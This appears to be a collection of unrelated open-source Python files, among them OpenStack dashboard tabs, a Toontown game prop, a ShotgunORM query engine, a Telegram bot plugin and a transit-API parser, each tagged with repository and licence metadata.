pattern = r'\b' + re.escape('ESAS')
symptoms = [variables[i] for i, x in enumerate(variables) if re.search(pattern, x)]
cmmi[symptoms[1]].unique()
###############################################################
#Build the Moderate / Severe Algorithm
###############################################################
inputt =list([str(i)] for i in range(0,11))
target = ['Mild','Mild','Mild','Mild','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe']
from sklearn import tree
clf = tree.DecisionTreeClassifier()
clf2 = clf.fit(inputt,target)
pickle.dump(clf2,open('/Users/nn31/Dropbox/40-githubRrepos/qdact-basic-analysis/notebooks/python_scripts/qdact_computable_phenotypes/model_objects/mod_sev_symptoms.p','wb'))
###############################################################
#Build the type of medication algorithm
###############################################################
#listt = ['1,210,012,050','1,207,512,100',np.float('nan'),'120,259,991,210,012,050','1,210,012,075','1,205,012,025','120,751,202,512,100','1,210,012,125','120,251,207,512,100','120,251,205,012,075']
| benneely/qdact-basic-analysis | notebooks/python_scripts/06_phenotype_algorithms.py | Python | gpl-3.0 | 1,722 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import messages
from horizon import tabs
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.stacks \
import api as project_api
from openstack_dashboard.dashboards.project.stacks \
import tables as project_tables
LOG = logging.getLogger(__name__)
class StackTopologyTab(tabs.Tab):
name = _("Topology")
slug = "topology"
template_name = "project/stacks/_detail_topology.html"
preload = False
def get_context_data(self, request):
context = {}
stack = self.tab_group.kwargs['stack']
context['stack_id'] = stack.id
context['d3_data'] = project_api.d3_data(request, stack_id=stack.id)
return context
class StackOverviewTab(tabs.Tab):
name = _("Overview")
slug = "overview"
template_name = "project/stacks/_detail_overview.html"
def get_context_data(self, request):
return {"stack": self.tab_group.kwargs['stack']}
class ResourceOverviewTab(tabs.Tab):
name = _("Overview")
slug = "resource_overview"
template_name = "project/stacks/_resource_overview.html"
def get_context_data(self, request):
return {
"resource": self.tab_group.kwargs['resource'],
"metadata": self.tab_group.kwargs['metadata']}
class StackEventsTab(tabs.Tab):
name = _("Events")
slug = "events"
template_name = "project/stacks/_detail_events.html"
preload = False
def get_context_data(self, request):
stack = self.tab_group.kwargs['stack']
try:
stack_identifier = '%s/%s' % (stack.stack_name, stack.id)
events = api.heat.events_list(self.request, stack_identifier)
LOG.debug('got events %s' % events)
except Exception:
events = []
messages.error(request, _(
'Unable to get events for stack "%s".') % stack.stack_name)
return {"stack": stack,
"table": project_tables.EventsTable(request, data=events), }
class StackResourcesTab(tabs.Tab):
name = _("Resources")
slug = "resources"
template_name = "project/stacks/_detail_resources.html"
preload = False
def get_context_data(self, request):
stack = self.tab_group.kwargs['stack']
try:
stack_identifier = '%s/%s' % (stack.stack_name, stack.id)
resources = api.heat.resources_list(self.request, stack_identifier)
LOG.debug('got resources %s' % resources)
except Exception:
resources = []
messages.error(request, _(
'Unable to get resources for stack "%s".') % stack.stack_name)
return {"stack": stack,
"table": project_tables.ResourcesTable(
request, data=resources, stack=stack), }
class StackDetailTabs(tabs.TabGroup):
slug = "stack_details"
tabs = (StackTopologyTab, StackOverviewTab, StackResourcesTab,
StackEventsTab)
sticky = True
class ResourceDetailTabs(tabs.TabGroup):
slug = "resource_details"
tabs = (ResourceOverviewTab,)
sticky = True
| Havate/havate-openstack | proto-build/gui/horizon/Horizon_GUI/openstack_dashboard/dashboards/project/stacks/tabs.py | Python | apache-2.0 | 3,774 |
try:
from pip._internal.req import parse_requirements
except ImportError:
from pip.req import parse_requirements
from setuptools import find_packages
from setuptools import setup
def get_long_description():
with open('README.md') as readme_file:
return readme_file.read()
setup(
name='jsonapi-requests',
version='0.6.2.dev0',
description='Python client implementation for json api. http://jsonapi.org/',
long_description=get_long_description(),
long_description_content_type='text/markdown',
author='Social WiFi',
author_email='it@socialwifi.com',
url='https://github.com/socialwifi/jsonapi-requests',
packages=find_packages(exclude=['tests']),
install_requires=[str(ir.req) for ir in parse_requirements('base_requirements.txt', session=False)],
setup_requires=['pytest-runner'],
tests_require=['pytest', 'flask'],
extras_require={
'flask': ['flask']
},
license='BSD',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
]
)
| socialwifi/jsonapi-requests | setup.py | Python | bsd-3-clause | 1,500 |
from direct.actor import Actor
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import Sequence, Func
from toontown.hood import InteractiveAnimatedProp
from toontown.hood import GenericAnimatedProp
from toontown.toonbase import ToontownGlobals, ToontownBattleGlobals, TTLocalizer
class MailboxInteractiveProp(InteractiveAnimatedProp.InteractiveAnimatedProp):
notify = DirectNotifyGlobal.directNotify.newCategory('MailboxInteractiveProp')
BattleCheerText = TTLocalizer.InteractivePropTrackBonusTerms[ToontownBattleGlobals.THROW_TRACK]
ZoneToIdles = {ToontownGlobals.ToontownCentral: (('tt_a_ara_ttc_mailbox_idle0',
3,
10,
'tt_a_ara_ttc_mailbox_idle0settle',
3,
10),
('tt_a_ara_ttc_mailbox_idleTake2',
1,
1,
None,
3,
10),
('tt_a_ara_ttc_mailbox_idleLook1',
1,
1,
None,
3,
10),
('tt_a_ara_ttc_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.DonaldsDock: (('tt_a_ara_dod_mailbox_idle0',
3,
10,
'tt_a_ara_dod_mailbox_idle0settle',
3,
10),
('tt_a_ara_dod_mailbox_idle2',
1,
1,
None,
3,
10),
('tt_a_ara_dod_mailbox_idle1',
1,
1,
None,
3,
10),
('tt_a_ara_dod_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.DaisyGardens: (('tt_a_ara_dga_mailbox_idle0',
3,
10,
'tt_a_ara_dga_mailbox_idle0settle',
3,
10),
('tt_a_ara_dga_mailbox_idleTake1',
1,
1,
None,
3,
10),
('tt_a_ara_dga_mailbox_idleLook2',
1,
1,
None,
3,
10),
('tt_a_ara_dga_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.MinniesMelodyland: (('tt_a_ara_mml_mailbox_idle0',
3,
10,
'tt_a_ara_mml_mailbox_idle0settle',
3,
10),
('tt_a_ara_mml_mailbox_idleTake1',
1,
1,
None,
3,
10),
('tt_a_ara_mml_mailbox_idleLook2',
1,
1,
None,
3,
10),
('tt_a_ara_mml_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.TheBrrrgh: (('tt_a_ara_tbr_mailbox_idleShiver1',
1,
1,
None,
3,
10),
('tt_a_ara_tbr_mailbox_idleSneeze2',
1,
1,
None,
3,
10),
('tt_a_ara_tbr_mailbox_idleSpin0',
1,
1,
None,
3,
10),
('tt_a_ara_tbr_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.DonaldsDreamland: (('tt_a_ara_ddl_mailbox_idleSleep0',
3,
10,
None,
0,
0),
('tt_a_ara_ddl_mailbox_idleShake2',
1,
1,
None,
0,
0),
('tt_a_ara_ddl_mailbox_idleSnore1',
1,
1,
None,
0,
0),
('tt_a_ara_ddl_mailbox_idleAwesome3',
1,
1,
None,
0,
0))}
ZoneToIdleIntoFightAnims = {ToontownGlobals.ToontownCentral: 'tt_a_ara_ttc_mailbox_idleIntoFight',
ToontownGlobals.DonaldsDock: 'tt_a_ara_dod_mailbox_idleIntoFight',
ToontownGlobals.DaisyGardens: 'tt_a_ara_dga_mailbox_idleIntoFight',
ToontownGlobals.MinniesMelodyland: 'tt_a_ara_mml_mailbox_idleIntoFight',
ToontownGlobals.TheBrrrgh: 'tt_a_ara_tbr_mailbox_idleIntoFight',
ToontownGlobals.DonaldsDreamland: 'tt_a_ara_ddl_mailbox_idleIntoFight'}
ZoneToVictoryAnims = {ToontownGlobals.ToontownCentral: 'tt_a_ara_ttc_mailbox_victoryDance',
ToontownGlobals.DonaldsDock: 'tt_a_ara_dod_mailbox_victoryDance',
ToontownGlobals.DaisyGardens: 'tt_a_ara_dga_mailbox_victoryDance',
ToontownGlobals.MinniesMelodyland: 'tt_a_ara_mml_mailbox_victoryDance',
ToontownGlobals.TheBrrrgh: 'tt_a_ara_tbr_mailbox_victoryDance',
ToontownGlobals.DonaldsDreamland: 'tt_a_ara_ddl_mailbox_victoryDance'}
ZoneToSadAnims = {ToontownGlobals.ToontownCentral: 'tt_a_ara_ttc_mailbox_fightSad',
ToontownGlobals.DonaldsDock: 'tt_a_ara_dod_mailbox_fightSad',
ToontownGlobals.DaisyGardens: 'tt_a_ara_dga_mailbox_fightSad',
ToontownGlobals.MinniesMelodyland: 'tt_a_ara_mml_mailbox_fightSad',
ToontownGlobals.TheBrrrgh: 'tt_a_ara_tbr_mailbox_fightSad',
ToontownGlobals.DonaldsDreamland: 'tt_a_ara_ddl_mailbox_fightSad'}
ZoneToFightAnims = {ToontownGlobals.ToontownCentral: ('tt_a_ara_ttc_mailbox_fightBoost', 'tt_a_ara_ttc_mailbox_fightCheer', 'tt_a_ara_ttc_mailbox_fightIdle'),
ToontownGlobals.DonaldsDock: ('tt_a_ara_dod_mailbox_fightBoost', 'tt_a_ara_dod_mailbox_fightCheer', 'tt_a_ara_dod_mailbox_fightIdle'),
ToontownGlobals.DaisyGardens: ('tt_a_ara_dga_mailbox_fightBoost', 'tt_a_ara_dga_mailbox_fightCheer', 'tt_a_ara_dga_mailbox_fightIdle'),
ToontownGlobals.MinniesMelodyland: ('tt_a_ara_mml_mailbox_fightBoost', 'tt_a_ara_mml_mailbox_fightCheer', 'tt_a_ara_mml_mailbox_fightIdle'),
ToontownGlobals.TheBrrrgh: ('tt_a_ara_tbr_mailbox_fightBoost', 'tt_a_ara_tbr_mailbox_fightCheer', 'tt_a_ara_tbr_mailbox_fightIdle'),
ToontownGlobals.DonaldsDreamland: ('tt_a_ara_ddl_mailbox_fightBoost', 'tt_a_ara_ddl_mailbox_fightCheer', 'tt_a_ara_ddl_mailbox_fightIdle')}
IdlePauseTime = base.config.GetFloat('prop-idle-pause-time', 0.0)
def __init__(self, node):
InteractiveAnimatedProp.InteractiveAnimatedProp.__init__(self, node, ToontownGlobals.MAILBOXES_BUFF_BATTLES)
def setupActor(self, node):
self.pieActor = Actor.Actor('phase_5/models/char/tt_r_prp_ext_piePackage', {'fightBoost': 'phase_5/models/char/tt_a_prp_ext_piePackage_fightBoost'})
self.pieActor.reparentTo(self.node)
self.pieActor.hide()
InteractiveAnimatedProp.InteractiveAnimatedProp.setupActor(self, node)
def hasSpecialIval(self, origAnimName):
result = False
if 'fightBoost' in origAnimName:
result = True
return result
def getSpecialIval(self, origAnimName):
result = Sequence()
if 'fightBoost' in origAnimName:
result.append(Func(self.pieActor.show))
result.append(self.pieActor.actorInterval('fightBoost'))
result.append(Func(self.pieActor.hide))
return result
| ksmit799/Toontown-Source | toontown/hood/MailboxInteractiveProp.py | Python | mit | 10,805 |
from telebot import types
from tululbot.utils import TululBot
class TestTululBot:
def test_user_property(self, mocker, fake_user):
bot = TululBot('TOKEN')
mock_get_me = mocker.patch.object(bot, 'get_me', autospec=True,
return_value=fake_user)
rv = bot.user
assert rv == fake_user
mock_get_me.assert_called_once_with()
def test_create_is_reply_to_filter(self, mocker, fake_message_dict, fake_user_dict):
fake_replied_message_dict = fake_message_dict.copy()
fake_message = types.Message.de_json(fake_message_dict)
fake_replied_message = types.Message.de_json(fake_replied_message_dict)
bot_user = types.User.de_json(fake_user_dict)
bot_message = 'Message text from bot goes here'
fake_replied_message.text = bot_message
fake_replied_message.from_user = bot_user
fake_message.reply_to_message = fake_replied_message
bot = TululBot('TOKEN')
bot.user = bot_user
assert bot.create_is_reply_to_filter(bot_message)(fake_message)
assert not bot.create_is_reply_to_filter('foo bar')(fake_message)
| tulul/tululbot | tests/test_utils.py | Python | apache-2.0 | 1,184 |
# Copyright (c) 2013, Nathan Dunsworth - NFXPlugins
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NFXPlugins nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NFXPLUGINS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
__all__ = [
'SgQueryEngine'
]
# Python imports
import threading
import weakref
# This module imports
import ShotgunORM
class SgQueryJob(object):
'''
'''
def __repr__(self):
eIds = []
for entity in self.entities():
e = entity()
if e == None:
continue
eIds.append(e.id)
return '<%s(type:%s, fields:%s, entities:%s)>' % (
type(self).__name__,
self.entityType(),
self.fields(),
eIds
)
def __lt__(self, item):
return self.fields() < item.fields()
def __gt__(self, item):
return self.fields() > item.fields()
def __eq__(self, item):
return self.fields() == item.fields()
def __init__(self, sgEntityType, sgEntities, sgFields):
self._entityType = sgEntityType
self._entities = set(sgEntities)
self._fields = set(sgFields)
def fields(self):
return self._fields
def entities(self):
return self._entities
def entityType(self):
return self._entityType
class SgQueryEngine(object):
'''
Class that represents an asynchronous Entity field value pulling engine.
'''
def __del__(self):
try:
self.shutdown()
except:
pass
def __enter__(self):
self.__lock.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.__lock.release()
return False
def __repr__(self):
connection = self.connection()
if connection == None:
return '<SgQueryEngine>'
return '<SgQueryEngine(url:"%(url)s", script:"%(script)s">' % {
'url': connection.url(),
'script': connection.scriptName()
}
def __init__(self, sgConnection):
self.__lock = threading.Lock()
self.__block = threading.RLock()
self._qEvent = threading.Event()
self._qShutdownEvent = threading.Event()
self._qEvent.clear()
self.__connection = weakref.ref(sgConnection)
self._pendingQueries = []
self._entityQueue = {}
self.__engineThread = threading.Thread(
name=self.__repr__(),
target=SgQueryEngineWorker,
args = [
self.__connection,
self.__lock,
self.__block,
self._qEvent,
self._qShutdownEvent,
self._entityQueue,
self._pendingQueries
]
)
self.__engineThread.setDaemon(True)
def addQueue(self, sgEntity, sgFields):
'''
Adds the passed Entity and the specified fields to the queue.
'''
# The field pull queue works by taking the fields that each Entity is asking
# to pull and batches them in alike groups minimizing the amount of passes
# the Shotgun database will need to return each Entity by type.
#
# Each time a new batch is added the currently pending pulls are locked and
# checked to see if the new batch items can be added to them. This means a
# late addition may return quicker then another item that was added to the
# queue ealier simply because its requesting a set of fields that are lower
# in the queue.
#
# Example 1:
#
# * ENTITY: FIELDS PULLING *
# Entity A: ['firstname', 'lastname']
# Entity B: ['firstname', 'lastname', 'created_by']
# Entity C: ['firstname, 'lastname', 'created_by', 'created_at']
#
# * BATCH: ENTITIES, FIELDS PULLING *
# Batch1: [A, B, C], ['firstname', 'lastname']
# Batch2: [B, C], ['created_by']
# Batch3: [C], ['created_at']
if not isinstance(sgEntity, ShotgunORM.SgEntity):
raise TypeError('expected an SgEntity got %s' % sgEntity)
if not self.__engineThread.isAlive():
raise RuntimeError('engine thread is not running')
try:
undoFields = []
pullFields = []
sgFields = set(sgFields)
for name, field in sgEntity.fields(sgFields).items():
pullFields.append(name)
# Mark the field that it is updating.
field._SgField__isUpdatingEvent.clear()
undoFields.append(field)
if len(pullFields) <= 0:
return
ShotgunORM.LoggerQueryEngine.debug('%(qEng)s.addQueue(...)', {'qEng': self})
ShotgunORM.LoggerQueryEngine.debug(' * sgEntity: %(sgEntity)s', {'sgEntity': sgEntity})
ShotgunORM.LoggerQueryEngine.debug(' * sgFields: %(sgFields)s', {'sgFields': pullFields})
with self:
pullFields = set(pullFields)
eq = None
t = sgEntity.type
if self._entityQueue.has_key(t):
eq = self._entityQueue[t]
else:
eq = []
self._entityQueue[t] = eq
valid = False
eqLen = len(eq)
if eqLen <= 0:
# Weakref the Entity, this allows the Engine to not keep Entities
# around.
entities = [weakref.ref(sgEntity)]
q = SgQueryJob(t, entities, pullFields)
eq.append(q)
self._pendingQueries.append(q)
valid = True
elif eqLen == 1:
# This check sees if the q for this Entity type contains only a
# single Entity and if so it sees if that Entity is the currently
# processing one. If so it merges the q's fields with the current
# list of fields for the Entity.
q = eq[0]
qEntities = q.entities()
if len(qEntities) == 1:
qEntity = list(qEntities)[0]()
if qEntity == sgEntity:
q.fields().update(pullFields)
valid = True
if not valid:
for q in eq:
qFields = q.fields()
# Skip when the current batch has more fields to query then the
# Entity is asking for.
if len(pullFields) < len(qFields):
continue
sharedFields = pullFields & qFields
if len(sharedFields) >= 1:
q.entities().add(
weakref.ref(sgEntity)
)
pullFields -= sharedFields
# Halt if all fields have been queued up!
if len(pullFields) <= 0:
break
if len(pullFields) >= 1:
entities = [weakref.ref(sgEntity)]
q = SgQueryJob(t, entities, pullFields)
eq.append(q)
self._pendingQueries.append(q)
# Un-lock the engine if the q was empty.
# if not self._qEvent.isSet():
self._qEvent.set()
# Sort the field q list so that the largest queries are first.
eq.sort(reverse=True)
except Exception, e:
ShotgunORM.LoggerQueryEngine.error(e)
for field in undoFields:
field._SgField__isUpdatingEvent.set()
raise
def block(self):
'''
Blocks the query engine.
This allows multiple Entities to be batch added and prevents engine from
prematurely processing results.
Note:
You must always make sure to call unblock() after you are finished adding
items to the queue. Even if your code raises and exception you must not
forget to unblock the engine.
'''
self.__block.acquire()
def connection(self):
'''
Returns the connection the engine belongs to.
'''
return self.__connection()
def isBlocking(self):
'''
Returns True if the engine is currently blocking.
'''
return self.__block._is_owned()
def pending(self):
'''
Returns the number of pending queries.
'''
return len(self._pendingQueries)
def shutdown(self):
'''
Shutdown the engine.
'''
if self.__engineThread.isAlive():
self._qEvent.set()
self._qShutdownEvent.wait()
def start(self):
'''
Starts the engines background thread.
'''
self.__engineThread.start()
def unblock(self):
'''
Un-blocks the query engine.
Note:
This must always be called after blocking the engine.
'''
self.__block.release()
def SgQueryEngineWorker(
connection,
lock,
block,
event,
eventShutdown,
entityQueue,
pendingQueries
):
##############################################################################
#
# IMPORTANT!!!!!
#
# You must make sure to delete any var that is created which points to an
# Entity object. Otherwise the worker wont let it fall out of scope and this
# will prevent the Entity from being gc'd.
#
##############################################################################
while True:
entityType = None
entityFields = None
entities = None
event.wait()
if len(pendingQueries) <= 0:
try:
ShotgunORM.LoggerQueryEngine.debug(
'Stopping because engine set event and pendingQueries size is zero'
)
except:
pass
eventShutdown.set()
return
with block:
q = pendingQueries.pop(0)
qSize = len(pendingQueries) + 1
ShotgunORM.LoggerQueryEngine.debug('Queue: job 1 of %(size)d', {'size': qSize})
with lock:
if len(pendingQueries) <= 0:
event.clear()
entityType = q.entityType()
entityFields = list(q.fields())
entities = list(q.entities())
entityQueue[entityType].remove(q)
ShotgunORM.LoggerQueryEngine.debug('Preparing to process job %(q)s', {'q': q})
entityList = {}
entityIds = []
for i in entities:
entity = i()
# Check it was gc'd!
if entity == None:
continue
try:
entityList[entity['id']] = entity
entityIds.append(entity['id'])
finally:
del entity
# Bail if all the Entities were gc'd!
if len(entityList) <= 0:
ShotgunORM.LoggerQueryEngine.debug('Skipping job all Entities no longer exist')
continue
ShotgunORM.LoggerQueryEngine.debug(' * Processing')
con = connection()
if con == None:
try:
ShotgunORM.LoggerQueryEngine.debug(
' * Stopping because connection not found'
)
except:
pass
return
try:
ShotgunORM.LoggerQueryEngine.debug(' * Searching')
sgSearch = None
if len(entityIds) == 1:
sgSearch = con._sg_find(entityType, [['id', 'is', entityIds[0]]], entityFields)
else:
sgSearch = con._sg_find(entityType, [['id', 'in', entityIds]], entityFields)
ShotgunORM.LoggerQueryEngine.debug(' * Searching complete!')
except Exception, e:
ShotgunORM.LoggerQueryEngine.error(e)
for entity in entityList.values():
for field in entity.fields(entityFields).values():
field._SgField__isUpdatingEvent.set()
del entity
del entityList
continue
finally:
del con
for result in sgSearch:
entity = entityList[result['id']]
del result['type']
try:
for fieldName, field in entity.fields(entityFields).items():
field.setSyncUpdate(result[fieldName])
field._SgField__isUpdatingEvent.set()
finally:
del entity
del entityList
eventShutdown.set()
try:
ShotgunORM.LoggerQueryEngine.debug(' * Processing complete!')
except:
pass
| ndunsworth/python-shotgunorm | ShotgunORM/SgQueryEngine.py | Python | bsd-3-clause | 12,533 |
class NotFound(Exception):
"""
This Exception should be raised, when the user queries an API and gets a
404 response.
"""
pass
class MultipleItemsReturned(Exception):
"""
This Exception should be raised, when the user queries an API for one
Resource, but more than one are returned.
"""
pass
class ValidationError(Exception):
"""
This Exception should be raised when a Jason Model fails validation.
"""
pass
| sourcelair/jason | jason/exceptions.py | Python | mit | 469 |
def lmgtfy(message):
m = bot.send_message(message.chat.id, "Please send the query you want to be LMGTFY'ed in your next message")
zigzag.nextstep(m, "lmgtfyquery")
def lmgtfyquery(message):
textl = message.text.replace("/lmgtfy ","", 1).replace("/Lmgtfy ", "", 1).replace("+","%2B")
rez = urllib.urlopen("http://r1z.ir/api.php?long=http://lmgtfy.com/?q={}".format(textl)).read()
bot.send_message(message.chat.id, "Direct link: `{}`\n\nOr [Click on this]({})".format(rez,rez), parse_mode="Markdown", disable_web_page_preview=True)
def inlinelmgtfy(query):
if query.query == "lmgtfy":
r = types.InlineQueryResultArticle('1', "Please enter a query to lmgtfy it!", types.InputTextMessageContent('http://google.com'))
bot.answer_inline_query(query.id, [r])
return
text = query.query.replace("lmgtfy ", "")
lmgtfyurl = urllib.urlopen("http://r1z.ir/api.php?long=http://lmgtfy.com/?q={}".format(text.replace(" ", "+"))).read()
try:
r3 = types.InlineQueryResultArticle('3', "Send inline lmgtfy message!", types.InputTextMessageContent("Direct link: `{}`\n\nOr click on [this :D]({})".format(lmgtfyurl, lmgtfyurl), parse_mode="Markdown", disable_web_page_preview=True))
bot.answer_inline_query(query.id, [r3], cache_time=1, is_personal=True)
except:
r3 = types.InlineQueryResultArticle('3', 'Error occured.', types.InputTextMessageContent("Unexpected error occured."))
bot.answer_inline_query(query.id, [r3], cache_time=1, is_personal=True)
class pllmgtfy:
patterns = ["^[/!]lmgtfy(.*)$"]
inlines = ["lmgtfy(.*)"]
| WebShark025/ZigZag-v2 | plugins/lmgtfy.py | Python | mit | 1,560 |
import os
import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('directory', type=str)
parser.add_argument('--output_file', type=str, default=None)
parser.add_argument('--recursive', action='store_true')
args = parser.parse_args()
root_dir = args.directory
img_exts = ['.jpg', '.png']
img_paths = []
if args.recursive:
for subdir, dirs, files in os.walk(root_dir):
for file in files:
basename, ext = os.path.splitext(file)
img_path = os.path.join(subdir, file)
print img_path, ext
if ext in img_exts:
img_paths.append(img_path)
else:
for item in os.listdir(root_dir):
if os.path.isfile(os.path.join(root_dir, item)):
basename, ext = os.path.splitext(item)
img_path = os.path.join(root_dir, item)
print img_path, ext
if ext in img_exts:
img_paths.append(img_path)
print img_paths
pts_paths = []
for img_i in img_paths:
filename, ext = os.path.splitext(img_i)
pts_i = filename + '.pts'
pts_paths.append(filename + '.pts')
def get_file_name(fullpath):
path_name, filename = os.path.split(fullpath)
return filename
if args.output_file is None:
output_filename = args.directory + '/settings.txt'
else:
output_filename = args.output_file
with open(output_filename, 'w') as f:
[f.write(get_file_name(pi) + ' ' + get_file_name(pp) + '\n') for pi, pp in zip(img_paths, pts_paths)]
| phg1024/MultilinearReconstruction | create_setting_file.py | Python | mit | 1,493 |
from time import strftime
class API_efaBeta(object):
def __init__( self ):
self.name = 'efaBeta'
self.baseurl = 'https://www3.vvs.de/mngvvs/XML_DM_REQUEST'
def convert_station_id( self, station_id ):
"""
convert station id that is given to the api specific
representation if necessary
@param station_id: id in general representation
@return id in api specific representation
"""
return station_id
def get_params( self, current_time_raw, station ):
"""
@param current_time_raw: time as gmtime object
@param station: station id in general representation
@return dict with key value pairs for api parameters
"""
itdDate = strftime("%Y%m%d", current_time_raw)
itdTime = strftime("%H%M", current_time_raw)
return {
'SpEncId' : 0,
'coordOutputFormat' : "EPSG:4326",
'deleteAssignedStops' : 1,
'itdDate' : itdDate,
'itdTime' : itdTime,
'limit' : 50,
'mode' : "direct",
'name_dm' : "de:8111:{}".format(self.convert_station_id(station)),
'outputFormat' : "rapidJSON",
'serverInfo' : "1",
'type_dm' : "any",
'useRealtime' : "1",
'version' : "10.2.2.48"
}
def function_to_call( self, results ):
"""
function that gets called on an api response
@param results: queue object of the api that contains result dicts from
the api call.
{
'timestamp': gmtime object -> when was the api call made
'name': api's name (id),
'station': station id,
'results': crawl results -> what came back from api
}
"""
results.put(None)
converted_results = []
for r in iter(results.get, None):
station = {}
current_dict = {}
station[r['station']] = [current_dict]
current_dict['timestamp'] = strftime('%Y-%m-%dT%H:%M:%SZ', r['timestamp']) # "2017-04-14 TEST"
current_dict['lines'] = {}
if not 'results' in r or not 'stopEvents' in r['results']:
continue
stop_events = filter(lambda elem:
elem['transportation']['product']['name']
== 'S-Bahn', r['results']['stopEvents'])
for st_event in stop_events:
departure_dict = {}
# print st_event
if 'isRealtimeControlled' in st_event:
departure_dict['isRealtimeControlled'] = st_event['isRealtimeControlled']
else:
departure_dict['isRealtimeControlled'] = False
if 'isRealtimeControlled' in departure_dict and 'departureTimeEstimated' in st_event:
departure_dict['departureTimeEstimated'] = st_event['departureTimeEstimated']
# else:
# departure_dict['departureTimeEstimated'] = None
departure_dict['departureTimePlanned'] = st_event['departureTimePlanned']
if 'infos' in st_event:
departure_dict['infos'] = []
for i in range(len(st_event['infos'])):
info = {}
if 'content' in st_event['infos'][i]:
info['content'] = st_event['infos'][i]['content']
else:
info['content'] = ""
info['title'] = st_event['infos'][i]['title']
info['subtitle'] = st_event['infos'][i]['subtitle']
info['properties'] = st_event['infos'][i]['properties']
departure_dict['infos'].append(info)
line = st_event['transportation']['number']
departure_dict['name'] = st_event['transportation']['product']['name']
departure_dict['class'] = st_event['transportation']['product']['class']
if line in current_dict['lines']:
current_dict['lines'][line].append(departure_dict)
else:
current_dict['lines'][line] = [departure_dict]
converted_results.append(station)
# print "Results: "
# with open("results.json", 'w') as output:
# json.dump(converted_results, output, indent=4)
# pprint(converted_results)
return converted_results
| jhertfe/vvs-delay | crawler/crawlerhelpers/efa_beta.py | Python | mit | 4,703 |
from django.core.management.base import BaseCommand
from danceschool.financial.helpers import (
createExpenseItemsForEvents, createExpenseItemsForVenueRental, createRevenueItemsForRegistrations
)
from danceschool.core.constants import getConstant
class Command(BaseCommand):
help = 'Create expense items for recurring expenses and generate revenue items for registrations'
def handle(self, *args, **options):
if getConstant('financial__autoGenerateExpensesEventStaff'):
self.stdout.write('Generating expense items for event staff...')
createExpenseItemsForEvents()
self.stdout.write('...done.')
else:
self.stdout.write('Generation of expense items for event staff is not enabled.')
if getConstant('financial__autoGenerateExpensesVenueRental'):
self.stdout.write('Generating expense items for venue rentals...')
createExpenseItemsForVenueRental()
self.stdout.write('...done.')
else:
self.stdout.write('Generation of expense items for venue rental is not enabled.')
if getConstant('financial__autoGenerateRevenueRegistrations'):
self.stdout.write('Generating revenue items for registrations...')
createRevenueItemsForRegistrations()
self.stdout.write('...done.')
else:
self.stdout.write('Generation of revnue items for registrations is not enabled.')
| django-danceschool/django-danceschool | danceschool/financial/management/commands/create_financial_items.py | Python | bsd-3-clause | 1,459 |
import os
import sys
import glob
import shutil
import errno
import logging
from contextlib import contextmanager
from plumbum.lib import _setdoc, IS_WIN32
from plumbum.path.base import Path, FSUser
from plumbum.path.remote import RemotePath
try:
from pwd import getpwuid, getpwnam
from grp import getgrgid, getgrnam
except ImportError:
def getpwuid(x):
return (None,)
def getgrgid(x):
return (None,)
def getpwnam(x):
raise OSError("`getpwnam` not supported")
def getgrnam(x):
raise OSError("`getgrnam` not supported")
try: # Py3
import urllib.parse as urlparse
import urllib.request as urllib
except ImportError:
import urlparse
import urllib
logger = logging.getLogger("plumbum.local")
#===================================================================================================
# Local Paths
#===================================================================================================
class LocalPath(Path):
"""The class implementing local-machine paths"""
CASE_SENSITIVE = not IS_WIN32
def __new__(cls, *parts):
if len(parts) == 1 and \
isinstance(parts[0], cls) and \
not isinstance(parts[0], LocalWorkdir):
return parts[0]
if not parts:
raise TypeError("At least one path part is require (none given)")
if any(isinstance(path, RemotePath) for path in parts):
